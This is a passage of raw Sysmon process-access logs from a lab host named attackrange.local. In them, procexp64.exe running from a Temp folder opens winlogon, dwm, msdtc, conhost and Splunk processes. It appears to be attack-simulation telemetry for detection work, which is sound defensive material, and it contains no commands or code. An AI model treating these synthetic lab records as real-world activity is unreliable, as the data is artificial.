\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784650Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784649Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784648Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784647Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784646Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784645Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784644Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784643Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784642Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784641Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784640Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784639Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784638Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784637Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784636Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784635Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784634Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784633Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program 